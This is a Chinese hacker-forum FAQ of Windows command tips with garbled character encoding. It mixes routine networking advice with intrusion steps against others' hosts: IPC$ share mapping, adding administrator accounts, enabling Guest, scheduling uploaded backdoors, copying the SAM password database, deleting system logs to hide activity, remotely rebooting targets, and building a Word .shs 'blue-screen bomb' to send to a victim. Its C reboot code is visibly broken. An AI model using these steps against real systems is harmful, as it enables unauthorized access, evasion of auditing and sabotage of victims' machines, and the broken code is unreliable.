1)如何查看本機(jī)所開端口:
用netstat -a —n命令查看�����!再stat下面有一些英文�����,我來簡(jiǎn)單說一下這些英文具體都代表什么
LISTEN:偵聽來自遠(yuǎn)方的TCP端口的連接請(qǐng)求
SYN-SENT:再發(fā)送連接請(qǐng)求后等待匹配的連接請(qǐng)求
SYN-RECEIVED:再收到和發(fā)送一個(gè)連接請(qǐng)求后等待對(duì)方對(duì)連接請(qǐng)求的確認(rèn)
ESTABLISHED:代表一個(gè)打開的連接
FIN-WAIT-1:等待遠(yuǎn)程TCP連接中斷請(qǐng)求�,或先前的連接中斷請(qǐng)求的確認(rèn)
FIN-WAIT-2:從遠(yuǎn)程TCP等待連接中斷請(qǐng)求
CLOSE-WAIT:等待從本地用戶發(fā)來的連接中斷請(qǐng)求
CLOSING:等待遠(yuǎn)程TCP對(duì)連接中斷的確認(rèn)
LAST-ACK:等待原來的發(fā)向遠(yuǎn)程TCP的連接中斷請(qǐng)求的確認(rèn)
TIME-WAIT:等待足夠的時(shí)間以確保遠(yuǎn)程TCP接收到連接中斷請(qǐng)求的確認(rèn)
CLOSED:沒有任何連接狀態(tài)
2)如何獲得一個(gè)IP地址的主機(jī)名?
利用ping -a ip 命令查看�����!再第一行的pinging后面的 『ip』前面的英文就是對(duì)方主機(jī)名�����!
同樣道理�,利用ping machine_name也可以得到對(duì)方的ip
獲得一個(gè)網(wǎng)站的ip地址的方法是:ping www.***.com
比如想知道sohu的ip,就用ping http://www.sohu.com/來查看就可以了
順便說一句:如果返回:Reply from *.*.*.*: TTL expired in transit的話�,呵呵,代表TTL(生命周期)在傳輸過程中過期
什么意思呢?我來解釋一下���!
導(dǎo)致這個(gè)問題出現(xiàn)的原因有兩個(gè):1)TTL值太??�!TTL值小于你和對(duì)方主機(jī)之間經(jīng)過的路由器數(shù)目��。 2)路由器數(shù)量太多�����,經(jīng)過路由器的數(shù)量大于TTL值��!
呵呵��,其實(shí)這兩點(diǎn)是一個(gè)意思�!只不過說法不同而已!
3)如何查看本機(jī)的ip地址�����?
用ipconfig來查看就可以���!
也可以再Windows中的開始菜單����,運(yùn)行中輸入winipcfg,同樣可以看到自己的ip
ipconfig命令后面如果加一個(gè)參數(shù) /all的話�,可以得到更加詳細(xì)的資料���,比如DNS�����、網(wǎng)關(guān)等……
4)再使用net命令的時(shí)候遇到一些錯(cuò)誤代碼�,如何查看對(duì)應(yīng)的錯(cuò)誤信息����?
用命令 net helpmsg erorr_code來查看就可以了
比如錯(cuò)誤代碼為:88
則查看命令為:net helpmsg 88 下面有這個(gè)錯(cuò)誤代碼的中文顯示!
5)利用telnet連接到對(duì)方主機(jī)上���,想獲得一些系統(tǒng)信息�,用什么命令����?
set命令可以很好的完成你所需要收集信息的任務(wù)的!
方法:再cmd下直接輸入set(telnet對(duì)方主機(jī)以后����,也是直接set就可以了~然后能夠得到NNNNN多的信息)
再這里�,computername:呵呵��,還用說么�����?主機(jī)名�����!
OS=Windows_NT :操作系統(tǒng)的類型哦~
path=C:\perl\bin\ :(perl的解釋器位置?��。?br>
systemDrive=c: 操作系統(tǒng)盤符�����!
USERNAME=coldcrysky 當(dāng)前登陸使用機(jī)器的用戶
……
(6)跟蹤路由器的命令是什么�����?
tracert 格式:tracert ip
中間會(huì)列出所有經(jīng)過的路由器列表����!這些路由器如果是暴露再防火墻外面的話,還可以看到路由的IP哦~呵呵(這里又涉及到了另外一個(gè)問題:為什么要把路由放在防火墻后面�?原因呢,主要有兩點(diǎn):1)保護(hù)路由器��!因?yàn)楝F(xiàn)在越來越多的攻擊和入侵已經(jīng)開始瞄準(zhǔn)路由器了~如果直接把路由暴露在外面��,呵呵����,是非常危險(xiǎn)的���!被DoS了就不好了啊~呵呵��,所以要放在防火墻里面����;2)為路由器減少負(fù)擔(dān)�����!如果所有的過濾功能統(tǒng)統(tǒng)都?jí)涸诼酚善魃厦?�,呵呵��,路由器的?fù)擔(dān)就太大了!)
當(dāng)然����,利用pathping也可以達(dá)到同樣效果!格式與tracert一樣���!
7)簡(jiǎn)單介紹一下cookie��!
cookie�����,又名小甜點(diǎn)���。
它的作用:記錄訪問者的一些信息。例如利用cookie記錄你所登陸這個(gè)網(wǎng)頁的次數(shù)�����、登陸時(shí)曾經(jīng)輸入的信息……
最常見的是��,大家再登陸論壇(郵箱)的時(shí)候�����,經(jīng)常在輸入第一個(gè)字母的時(shí)候,往往下面就顯示出了所有在本機(jī)登陸過該論壇(郵箱)的用戶名吧����?呵呵,這個(gè)就是cookie的作用���!
大家在Administrator的cookies目錄中可以看到很多的記事本文檔吧���?這些都是cookie,雖然經(jīng)過了加密����,但是仔細(xì)查找的話���,仍然能夠看到一些敏感信息�����!況且現(xiàn)在也已經(jīng)有了專門查看cookie的軟件��!利用這些軟件��,你的隱私將不保哦~
那么����,如何清除cookie呢?一般情況下����,可以在Internet選項(xiàng)中的常規(guī)選項(xiàng)卡中看到一個(gè)刪除cookies的按鈕,點(diǎn)擊就可以清楚掉了~
除此以外����,還要在internet選項(xiàng)中的內(nèi)容選項(xiàng)卡中找到自動(dòng)完成按鈕,把里面的四項(xiàng)都選中�!然后點(diǎn)擊清除表單,清除密碼~
然后到操作系統(tǒng)目錄所在的分區(qū)中���!進(jìn)入Winnt(98為windows)目錄(當(dāng)然了�,這些都是默認(rèn)的目錄����!如果你安裝的時(shí)候改名了,就對(duì)應(yīng)的去相應(yīng)目錄)之后找到Temporary Internet Files目錄(2000的目錄在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目錄下找Temporary Internet Files就可以了~����,找到這個(gè)文件夾后,打開!看到里面有NNNNNNNNNNNN多的文件了么�����?呵呵�,這些是你瀏覽過的網(wǎng)頁的記錄(有的時(shí)候從網(wǎng)站上面看到漂亮的FLASH,可是不能保存怎么辦�?只要在線瀏覽一遍以后,斷線到這里來找*.swf�,之后依次打開查看的話,相信你會(huì)找到你所需要的FLASH的?。昧?��,跑題了~繼續(xù)說:這些文件是網(wǎng)站的頁面記錄,直接刪除就可以了�����!
另外,有沒有徹底禁止cookie的方法呢����?
呵呵�,當(dāng)然有了!在IE的Internet選項(xiàng)中��,找到隱私選項(xiàng)卡��!��,把里面的滑塊拖到最上面���,邊上寫著:阻止所有cookie,呵呵�����,是不是��?
另外一種方法:找到Windows目錄下的cookies目錄��!把里面的txt文件全部刪除�����!,最后應(yīng)該只剩下一個(gè)index.dat文件��!之后把這個(gè)文件夾設(shè)置成只讀就可以了~
不過�,禁止cookie后,大部分的論壇都無法正常登陸了?���。『呛?��,到底禁止不禁止就看你自己的了~
8)安裝2000的時(shí)候�����,速度會(huì)特別特別特別慢�,怎么加快安裝速度呢���?
在DOS上面安裝���,應(yīng)該用98啟動(dòng)光盤來引導(dǎo)系統(tǒng)!然后按照下面的方法來做�����,可以提高安裝速度:
g:\>cd windows -------假設(shè)G為光驅(qū) windows為98的安裝目錄��!
g:\windows>smartdrv -------加載smartdrv程序���!加載后沒有任何提示信息�����!只要不返回錯(cuò)誤信息就是加載成功了~這時(shí)候安裝2K的話����,速度會(huì)很快的哦~
9)Windows2K密碼忘記了���,如何才能進(jìn)入系統(tǒng)���?
Windows2K的用戶配置信息和密碼保存在SAM文件里!該文件位于:c:\winnt\system32\config目錄中��!只要?jiǎng)h除這個(gè)文件就可以了~
另外���,在c:\winnt\repair目錄中也同樣有一個(gè)SAM文件(這個(gè)是前者的備份?。┤绻阍诘顷懭怆u的時(shí)候����,copy前面那個(gè)目錄中的SAM文件���,你會(huì)發(fā)現(xiàn)COPY不下來!呵呵����,為什么?因?yàn)檫\(yùn)行著的2K系統(tǒng)會(huì)保護(hù)SAM文件啊~這個(gè)時(shí)候你就COPY這個(gè)就可以了��!
10)ping不到��,tracert不到���,但是卻能用nbtstat顯示對(duì)方的一些信息�����,為什么���?
因?yàn)閠racert和ping命令使用的是ICMP協(xié)議!而nbtstat是通過對(duì)方的netbios端口來獲得對(duì)方的主機(jī)信息的����!使用的是UDP和TCP協(xié)議�!如果對(duì)方僅僅只對(duì)ICMP協(xié)議做了禁止的話�����,那通過這個(gè)命令獲得系統(tǒng)信息是正常的�����!
11)telnet上去后����,如何給對(duì)方開共享����?
開共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c來訪問對(duì)方的system目錄了~刪除共享用
share c /del 命令就可以了
12)如何判斷對(duì)方的具體操作系統(tǒng)版本?
首先用ver命令查看對(duì)方的版本號(hào)�!
如果是5.00.2195的話,為2K���;5.1.2600為XP
從這里可以區(qū)分出來到底是2K還是XP了~下面進(jìn)行更加具體的區(qū)分�����!
2K的pro和svr版本區(qū)分:
在telnet下�����,net shart查看啟動(dòng)的服務(wù)~如果對(duì)方開啟了Terminal Services服務(wù)的話����,基本上可以判斷為svr以上的版本了~如果沒有開啟,則為pro?。ň唧w方法有三種,因?yàn)榍皫滋煸谡搲形一貜?fù)過暗界了~所以這里就不再重復(fù)了~)
XP的pro和home版的區(qū)分:
home edition是無法安裝iis的�!所以,可以通過iis服務(wù)來判斷到底是home版或者是pro了~
當(dāng)然了���,如果對(duì)方是pro��,但是將iis刪除(停用)的話�����,就沒辦法判斷了~呵呵
13)如何查看98的隨機(jī)啟動(dòng)的程序�����?
在98下有一個(gè)實(shí)用配置程序(msconfig)��,中文名為:系統(tǒng)配置實(shí)用程序���,調(diào)用的方法是在:開始--運(yùn)行中輸入msconfig����,在里面��,有一個(gè)啟動(dòng)的選項(xiàng)卡���,點(diǎn)擊后,可以看到很多隨即啟動(dòng)程序�,如果前面帶有鉤的話,就是啟動(dòng)時(shí)隨機(jī)啟動(dòng)的����,取消的話就是把前面的小鉤去掉就可以了~(如果在這里查看到了一些未知的啟動(dòng)文件--比如沒有文件的具體路徑,或者沒有文件名的話�,最好取消它的自啟動(dòng)!因?yàn)楹苡锌赡苁悄抉R?��。?br>
除了這里以外���,還有config.sys、autoexec.bat��、system.ini、win.ini幾個(gè)選項(xiàng)卡���,他們分別對(duì)應(yīng)這幾個(gè)文件��!只不過在這里更方便查看而已�����!
14)設(shè)置了BIOS密碼���,可是卻忘記了,該怎么辦����?
如果是可以進(jìn)入Windows的話,可以找找biospwds和cmospwd這兩個(gè)軟件看看~
還有利用DEBUG法:
簡(jiǎn)單介紹兩種:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一種方法:copy法:
copy con cmos.com
輸入下面10個(gè)字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格����,然后按下F6并回車,退出�����,運(yùn)行這個(gè)cmos.com程序就可以了~
恩,如果不能進(jìn)入Windows怎么辦呢�?
簡(jiǎn)單介紹兩種方法:
1)用通用密碼:
Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
這是常見的密碼,不妨試試~
如果不行的話�,可以利用CMOS放電:
就是把主板上的電池取下來,等一會(huì)兒再插上去~
15)如何自制一個(gè)讓98藍(lán)屏的炸彈��?
恩����,這個(gè)是前幾天QQ上面朋友問我的問題,整理的時(shí)候突然間想起來了���,就寫一下好了~
首先,打開Word�,再插入菜單中選擇對(duì)象,這時(shí)��,彈出對(duì)象包裝程序窗口�,再這個(gè)窗口中,點(diǎn)擊導(dǎo)入����,隨便找一個(gè)文本或者程序就可以!之后點(diǎn):編輯菜單�����。這里選擇命令行,出現(xiàn)一個(gè)命令行窗口�����,在里面協(xié)商c:\con\con���,點(diǎn)擊保存���,完成后,再點(diǎn)編輯包中的復(fù)制包����,把他隨便到一個(gè)地方復(fù)制下來,之后看到的是一個(gè)名位片斷的東西���!給這個(gè)文件起一個(gè)名字�,呵呵����,傳給那個(gè)可憐的家伙吧,等待他藍(lán)屏��,掉線!
(這個(gè)命令行中可以插入很多的命令����,不見得非要用這個(gè)98藍(lán)屏漏洞哦~)順便說一下:這個(gè)已經(jīng)不是什么新鮮的技術(shù)了,這個(gè)技術(shù)的名字叫做:碎片對(duì)象��。呵呵��,碎片�?記憶碎片么?不是的�����!他的后綴是:.shs�!之所以說一下這個(gè)�,是因?yàn)橛械呐笥堰€不知道~做一個(gè)整理而已!不知道的朋友看過后就知道了�����,知道的朋友就權(quán)當(dāng)復(fù)習(xí)了~另外�,不要利用這個(gè)方法做破壞!否則后果自負(fù)��!
16)如何再命令行下殺死對(duì)方進(jìn)程?
利用微軟的2K以上操作系統(tǒng)都是含有這個(gè)工具的�����!該工具包含在2K光盤的\support\tools文件夾下��!里面有安裝程序�����,點(diǎn)擊后���,就安裝了2K的support tools工具包����,里面有kill這個(gè)工具���,這時(shí)候再cmd下可以輸入kill/?��,就可以看到幫助了�,使用這個(gè)命令的格式是:kill pid (pid是進(jìn)程的ID號(hào)?��。┰偃蝿?wù)管理器中可以看到進(jìn)程的ID號(hào)?�。ú恢烙袔孜慌笥延眠^藍(lán)色火焰��?呵呵���,用法跟這個(gè)一摸一樣����!還有很多類似的木馬���、后門軟件都有類似的功能�!這個(gè)是windows自帶的大木馬『后門工具』而已?�。?br>
這時(shí)候�����,有朋友問了��,那再命令行下如何查看進(jìn)程呢����?呵呵�����,這就用到了系統(tǒng)自帶的有一個(gè)后門工具了:再剛才說得那個(gè)目錄中,還有一個(gè)工具叫tlist 看名字就能看出來是干什么的吧��?用法更簡(jiǎn)單�����!直接輸入tlist就可以得到pid遇隊(duì)形程序的列表了~
那對(duì)方機(jī)器如果沒有安裝這兩個(gè)程序怎么辦呢�?沒關(guān)系����,你把你操作系統(tǒng)盤符下面programfiles\support tools目錄下面的這兩個(gè)對(duì)應(yīng)的exe文件上傳到對(duì)方的winnt\system32目錄中就可以了!呵呵~
17)上次說了ping的基本用法����,這次談?wù)刾ing的命令參數(shù)!
這個(gè)是本次問題集的重點(diǎn)部分�!無論是小鳥還是老鳥,你們能保證你真的對(duì)這些參數(shù)了如指掌么�����?恐怕都未必�!還是好好看看吧����!
這是TCP/IP協(xié)議中最有用的命令之一
它給另一個(gè)系統(tǒng)發(fā)送一系列的數(shù)據(jù)包���,該系統(tǒng)本身又發(fā)回一個(gè)響應(yīng)�����,這條實(shí)用程序?qū)Σ檎疫h(yuǎn)程主機(jī)很有用����,它返回的結(jié)果表示是否能到達(dá)主機(jī)�,宿主機(jī)發(fā)送一個(gè)返回?cái)?shù)據(jù)包需要多長(zhǎng)時(shí)間。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人為中止��,否則一直ping下去)
-a Resolve addresses to hostnames.(把IP轉(zhuǎn)為主機(jī)名)
-n count Number of echo requests to send.(響應(yīng)請(qǐng)求的數(shù)量)
-l size Send buffer size.(封包的大?。?
-f Set Don`t Fragment flag in packet.(信息包中無碎片)
-i TTL Time To Live.(時(shí)間)
-v TOS Type Of Service.(服務(wù)類型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(較嚴(yán)格的……唉,怎么譯好……算了����,放著吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的時(shí)間)
比如大家可能都知道的一個(gè)命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死霉國(guó)佬時(shí)所用的命令(當(dāng)然這樣只會(huì)造成我方自己的網(wǎng)絡(luò)阻塞)。
其實(shí)這個(gè)命令主要是用來看對(duì)方應(yīng)答的速度��,如果怎么ping 得到的結(jié)果都是request time out���。那恐怕你根本就不用你去找這臺(tái)主機(jī)了����,它不在你的射程之內(nèi)���。
18)如何查看本機(jī)的DNS服務(wù)器���?
ipconfig其實(shí)是可以的(呵呵,上次就介紹過這個(gè)命令)�,除此以外,還可以利用一個(gè)命令:再cmd下輸入netsh����,進(jìn)入到netsh>提示符,再輸入:int ip 進(jìn)入到interface ip> 然后再次輸入dump���,這時(shí)候屏幕上出現(xiàn)當(dāng)前連接的配置情況了
這里必須介紹一下netsh到底是作什么用的�����!這個(gè)命令比較復(fù)雜���,他包含了很多的子命令��,所以這里只對(duì)部分命令進(jìn)行講解:
1)查看本機(jī)IP:首先鍵入netsh����,再netsh>提示符下輸入:interface 回車 之后:ip 回車 再之后:show address 回車 這樣�����,就可以看到當(dāng)前連接的IP地址和子網(wǎng)掩碼�。(其實(shí)這個(gè)命令不如ipconfig簡(jiǎn)單,也不如ipconfig/all全面)
2)修改網(wǎng)絡(luò)配置:接著上面的命令����,我們使用:set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當(dāng)前的IP地址�����,用show address來看看(或者用ipconfig)
3)顯示一個(gè)完整的網(wǎng)絡(luò)配置教本:
剛才說過�����,第一個(gè)命令顯示的信息不如ipconfig/all全面��,不用著急,netsh再打印顯示網(wǎng)絡(luò)配置上��,還是有自己的特色的!例如:再interface ip>狀態(tài)下輸入:dump,會(huì)顯示一個(gè)清單�����,顯示所有本地連接(不管你是否使用~)與netstat -an不完全一樣�!
這就是netsh的簡(jiǎn)單介紹和最基礎(chǔ)的用法!希望大家能夠掌握���!還可以輸入����?來查看幫助?。ㄒ趎etsh>提示符下才能查看幫助啊~)
19)肉雞上的部分文件無法刪除,怎么辦��?
如果對(duì)方的文件夾是只讀的話�,會(huì)出現(xiàn)拒絕訪問的字樣!這時(shí)候����,我們可以再del命令后面加上/f參數(shù)來刪除!
20)再說一個(gè)可以限制用戶登陸時(shí)間的命令!
再net命令中就可以實(shí)現(xiàn)這樣的功能����!具體方法如下:
假如我們打算讓:coldcrysky這個(gè)用戶再周日到周易的上午八點(diǎn)到下午四點(diǎn)之間可以登陸,用這個(gè)命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令來查看登陸時(shí)間的限制���,可以看到是我們所規(guī)定的時(shí)間(因?yàn)槭侵形牡?�,很容易懂���,我就不多廢話了)
在此,特別提醒各位:命令中:星期日才是一周的開始?���。?�!不要當(dāng)成星期一�!
光說了怎么設(shè)置,如果想恢復(fù)回去怎么辦呢���?(就是恢復(fù)成默認(rèn)狀態(tài)����,任何時(shí)間都可以登陸的狀態(tài))
看我的:net user coldcrysky /time:all --這樣就可以了~
22)如何刪除windows2K的默認(rèn)貢獻(xiàn)?
首先打開記事本���,輸入如下內(nèi)容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
這里的c$����、d$�����、e$……是代表默認(rèn)共享的盤符~又幾個(gè)就設(shè)置幾個(gè)就可以了~
之后點(diǎn)擊保存成批處理文件(后綴為:bat的文件?���。?���!加入到啟動(dòng)組中就可以了~
23)139端口的又一用法
呵呵,寫這個(gè)帖子的原因是因?yàn)槲掖饝?yīng)給一個(gè)朋友回復(fù)139端口的作用來著……先聲明兩點(diǎn):1)不要利用本帖所提到的方法去搞惡意破壞��!2)呵呵�����,可能許多人已經(jīng)知道了139端口這個(gè)用法了~本文只想起到一個(gè)拋磚引玉的作用��!
廢話不多說了~開始:
如果你使用NT主機(jī)的話,那你可要注意了����!
重啟NT主機(jī)的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一個(gè)IPC連接
2:net use H: \\XXX.XXX.XXX.XXX\C$
將對(duì)方的C盤映射為自己的h盤
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在對(duì)方的C盤上生成一個(gè)能重啟機(jī)器的文件
4:net time \\XXX.XXX.XXX.XXX
得到對(duì)方機(jī)器時(shí)間
5:at \\XXX.XXX.XXX.XXX 重啟的時(shí)間 c:\reboot.bat
設(shè)定對(duì)方重啟的時(shí)間!
6:at \\XXX.XXX.XXX.XXX
查看任務(wù)上面是否添加了這個(gè)任務(wù)
7:等對(duì)方重啟好了~
上面的第三步是only for Win2K的�,如果是Nt,就需要用意個(gè)指定的重啟程序��,我們可以自己編寫一個(gè)reboot.exe來代替reboot.bat��,代碼如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定義重啟的時(shí)候發(fā)送給所有用戶的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://嘗試用最簡(jiǎn)單的API函數(shù)重啟
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因?yàn)樯厦娴闹貑⒉怀晒?���,所以需要調(diào)整本進(jìn)程的特權(quán)
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://獲取重啟的特權(quán) SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判斷是NT內(nèi)核還是9X內(nèi)核,選擇用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
對(duì)了��,再次說明啊��,別用本文提到的方法搞破壞����,小心警察叔叔打PP~呵呵
24)利用批處理文件來建立一個(gè)記錄3389登陸者信息的記錄器
由于Terminal Service默認(rèn)是沒有日志記錄的,只能依靠他的系統(tǒng)日志����,但是系統(tǒng)日志只能記錄一些大動(dòng)作(開啟或停止服務(wù))����,那么�,如何用批處理文件來編寫一個(gè)將是3389端口的程序呢?很簡(jiǎn)單:
建立一個(gè)批處理文件:內(nèi)容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存��!
如果有人用你的3389登陸你的機(jī)器�����,呵呵���,在c盤下就有3389log.txt這個(gè)文件!記錄了當(dāng)天日志�,還有連接時(shí)間……資料~開始反擊~呵呵
25)網(wǎng)絡(luò)命令小節(jié)
A、NET命令:
IPC連接:格式 net use \\對(duì)方IP\ipc$ "密碼" user:"用戶名" 『建立IPC連接~』
net use \\對(duì)方IP\ipc$ /delete 『斷開連接~』
以下操作需要在連接到對(duì)方主機(jī)后才可進(jìn)行?����。���?���!
net user coldcrysky xyz /add 『在連接的目標(biāo)主機(jī)中加入一個(gè)用戶名為COLDCRYSKY 密碼為WYZ的用戶』
net localgroup Administrator coldcrysky /add 『把名為coldcrysky的用戶加入ADMIN組-以為著權(quán)限的提高啊?。���?!^_^』
net use z:\\對(duì)方IP\C$ 『把對(duì)方的C盤映射為本機(jī)的Z盤-可依照需要更改映射盤符!』
net start telnet 『開啟TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密碼改為COLDCRYSKY』
B���、AT命令:
查看遠(yuǎn)程機(jī)時(shí)間:net time \\對(duì)方IP
加入一項(xiàng)新任務(wù):
at \\對(duì)方IP 時(shí)間 文件名 『用來把自己上傳的后門程序在制定時(shí)間運(yùn)行,方便以后進(jìn)入肉雞���!』
C、TELNET命令:
telnet 對(duì)方IP 端口 『作用不用我說了吧���?�?����?』
D�、FTP命令:
登陸:ftp 對(duì)方網(wǎng)址(IP地址)
上傳文件:get 文件在本機(jī)完整路徑 對(duì)方文件存放完整路徑
下載文件:put 對(duì)方文件完整路徑 本機(jī)存放文件路徑
E、COPY命令:
在建立連接后(尤其是IPC$連接后���,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『將本機(jī)index.htm文件復(fù)制到127.0.0.1的C盤下��,如果要放到對(duì)方的NT目錄下�,則把C改為admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『將遠(yuǎn)程機(jī)數(shù)據(jù)庫(kù)文件拷貝到本機(jī)C盤根目錄下』F����、SET命令:
主要用于分析目標(biāo)計(jì)算機(jī)的基本信息用!具體使用方法請(qǐng)查找相關(guān)文件���!
G�、NBTSTAT命令:
nbtstat -A 對(duì)方IP (這個(gè)A大寫)
『在其中顯示<037>前面的英文或數(shù)字就是計(jì)算機(jī)名稱���!當(dāng)然,也可以利用PING -A 對(duì)方ip的方法來查看對(duì)方主機(jī)名!效果相同!?���?!』
H、SHUTDOWN命令:
『用來關(guān)閉對(duì)方NT服務(wù)的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自動(dòng)關(guān)閉對(duì)方NT服務(wù)!由于對(duì)對(duì)方機(jī)器影響較大,慎用!!�!』
I���、DIR命令:
還用我說么?大家是不是早就該掌握了��?����?�?(不知道的還是查閱相關(guān)資料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有內(nèi)容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件屬性用����,格式:
Attrib -r index.htm 『去掉只讀屬性』(+- 分別代表增加和減少)
L�、DEL命令:
『刪除日志的時(shí)候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道網(wǎng)絡(luò)斷開或按CTRL+C結(jié)束!
-a :解釋PING IP的主機(jī)名
-n count :發(fā)送count指定的ECHO數(shù)據(jù)包,默認(rèn)為4個(gè)!
26)這里我必須(或者說不得不重新重申一個(gè)命令���!不過說之前我要把這個(gè)命令的相關(guān)命令稍微介紹一下?���。?br>
我要說的命令就是:開啟服務(wù)和停止服務(wù)的net start and net stop
這兩個(gè)命令大多數(shù)朋友已經(jīng)很熟悉了吧�����?不過為了方便更多的菜鳥能看明白我要說的意思,不用再看其他相關(guān)文章�����,所以我簡(jiǎn)單說兩句:net start是開啟服務(wù)��!那么�,如何開啟呢�?比如,我們這里要開啟telnet服務(wù)����,那就直接再2K的cmd下輸入:net start telnet就OK了~關(guān)閉一項(xiàng)服務(wù)的話,把start換成stop就OK了~不過這里必須要注意:你所關(guān)閉的服務(wù)必須是已經(jīng)開啟的服務(wù)?��。�?�!好像是一句廢話
OK��,有了這個(gè)前提后��,下面就繼續(xù)介紹:那么�����,net start和net stop到底能開啟什么服務(wù)����?其實(shí)這點(diǎn)也不需要你強(qiáng)記��,記住這個(gè)命令就可以了:net help start和net help stop����,這兩個(gè)會(huì)顯示出你所能開啟的服務(wù)有那些~~
這里比如我們查到了這個(gè)服務(wù)“CLIENT SERVICE FOR NETWARE”����,那么當(dāng)這個(gè)命令使用net start和net stop的時(shí)候,你必須在這項(xiàng)服務(wù)上面加上“”�����,原因是因?yàn)檫@個(gè)服務(wù)名稱中帶有空格����!如果服務(wù)名稱中不帶空格,你可以不用帶這個(gè)引號(hào)?���。��?���!這點(diǎn)是我強(qiáng)調(diào)的問題���!大家一定不要忘記了!『前些天看到S8S8.net的黑白新區(qū)中有人說net start 和 net stop后面的服務(wù)名必須帶空格是錯(cuò)誤的���!明白原因了吧����?』
27)關(guān)于雙系統(tǒng)的兩個(gè)問題:
A��、如何在雙系統(tǒng)(98�����、2000)中安全刪除2K��?
先制作一張Windows 98 的啟動(dòng)軟盤��,再用它啟動(dòng)你的計(jì)算機(jī)�,運(yùn)行sys命令恢復(fù)Windows 98引導(dǎo)記錄后,再運(yùn)行fdisk/mbr恢復(fù)主引導(dǎo)記錄���,完成后進(jìn)入Windows 98����,把winnt 和system volumn information 目錄刪除,再刪掉C盤上的boot.ini��、bootfont.bin�����、ntldr����、nydetect.com、bootsect.dos文件就行了����。
B、 Windows 98/XP雙系統(tǒng)啟動(dòng)菜單修復(fù)
1.修復(fù)前����,在BIOS中設(shè)置從光驅(qū)啟動(dòng)。用Windows XP安裝盤啟動(dòng)電腦�����,在加載必要的驅(qū)動(dòng)后���,出現(xiàn)Windows XP的安裝界面���。有三個(gè)選項(xiàng):
(1)要現(xiàn)在開始安裝Windows XP,請(qǐng)按“Enter”鍵�。
(2)要用“恢復(fù)控制臺(tái)”修復(fù)Windows XP安裝,按“R”鍵���。
(3)要退出安裝程序�,不安裝Windows XP�����,按“F3”鍵���;
2. 按“R”鍵����,進(jìn)入“Microsoft Windows XP (TM) 故障恢復(fù)控制臺(tái)”界面����;故障恢復(fù)控制臺(tái)提供系統(tǒng)修復(fù)和故障恢復(fù)功能。系統(tǒng)這時(shí)會(huì)搜尋已安裝的Windows XP系統(tǒng)文件��,然后顯示搜尋結(jié)果,并詢問“要登錄到哪個(gè)Windows XP安裝(要取消����,請(qǐng)按Enter)”,選擇1. D:\Windows����,回車,系統(tǒng)會(huì)再詢問“管理員密碼”�,再鍵入安裝Windows XP時(shí)設(shè)置的管理員密碼,回車���,出現(xiàn)D:\Windows〉����,這時(shí)需要輸入修復(fù)命令Fixboot�����,后面的參數(shù)為啟動(dòng)扇區(qū)要寫入的磁盤盤符�,這里填入C:,回車�����。修復(fù)完成,鍵入Exit退出����。重啟后就會(huì)看到久違的雙重啟動(dòng)菜單了�。并且,這樣修復(fù)后基本不產(chǎn)生垃圾文件����。
因?yàn)檫@兩個(gè)問題是非常非常普遍的,所以我就收集到這里了~
28)這里說幾個(gè)主頁惡意代碼:『并不是讓大家把這些代碼加入到自己的主頁中����!只是希望大家能了解惡意代碼,起到更好的防護(hù)作用�!』
